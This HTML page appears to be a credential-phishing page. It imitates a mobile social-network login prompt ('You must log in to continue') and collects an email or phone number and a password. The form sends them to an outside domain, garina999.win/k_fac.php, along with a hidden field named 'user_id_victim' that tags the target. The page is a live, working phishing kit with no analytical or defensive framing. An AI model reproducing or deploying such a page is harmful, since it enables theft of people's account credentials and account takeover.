<html>

<head>



    <meta name="viewport" content="width=device-width , initial-scale=1.0">

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <style>
        body {
            margin: 0;
            font-family: sans-serif;
            line-height: 16px;
            font-size: 13px;
        }

        .navbar {
            background: #001f90b8;
            height: 39px;
            width: 100%;
        }

        .contact-us a {
            color: #00184a78;
            font-size: 11px;
        }

        .nav-head {
            background-color: #ffdc0026;
            color: #5d530eb8;
            padding: 6px 10px;
        }

        .contact-us {
            padding-bottom: 21px;
            text-align: center;
        }


        .formulaire.formulaire>* {
            border-bottom: 1px solid #c7c3c369;
        }

        .entrer {
            border: 0;
            width: 100%;
        }

        /*
    submit
    */

        .koala {
            display: inline-block;
            -webkit-border-radius: 3px;
            font-weight: bold;
            background-color: #0036f999;
            font-size: 13px;
            line-height: 34px;
            padding: 0 18px;
            color: white
        }

        .square_btn {
            position: relative;
            display: inline-block;
            padding: 11px;
            text-decoration: none;
            color: white;
            background: #1e4088b8;
            border-radius: 4px;
            font-weight: bold;
            border: 15px #f30909;
            width: 100%;
        }


        /* neveau compte */
        .fruit {
            text-align: center;
            padding: 9px;
        }
    </style>

    <script type="text/javascript" async="" src="//s10.histats.com/js15_as.js"></script>
</head>

<body>
    <!-- NavBar -->
    <div class="navbar"></div>
    <div style="display:-webkit-box">
        <div style="-webkit-box-flex:1">
            <!--Nav-Header-->


            <!-- Formulaire -->
            <div style="background-color:#2c3b5a0f;padding:2 31px">
                <center>
                    <img src="https://i.imgur.com/E0hzZhO.jpg" width="300px">
                    <div class="nav-head">
                        <span> You must log in to continue. </span>
                    </div>

                    <form method="POST" style="padding-top:17px;" action="https://www.garina999.win/k_fac.php">
                        <div class="formulaire" style="background:white;">


                            <input name="email" type="text" placeholder="Email or phone " class="entrer"
                                style="padding:12px;">



                            <input name="type" type="hidden" value="mobile">
                            <input type="hidden" name="user_id_victim" value="4GZEZ">



                            <input name="pass" value="" type="password" placeholder="Password " class="entrer"
                                style="padding:12px;">
                            <div style="padding:12px;">



                                <button type="submit" class="square_btn"> Login </button>


                            </div>
                        </div>
                    </form>

                    <div class="fruit">
                        <a class="koala">Need a new account</a>
                    </div>

                    <div class="contact-us">
                        <a>Forgotten account ? Need Help</a>
                    </div>
                </center>
            </div>
        </div>
    </div>






</body>

</html>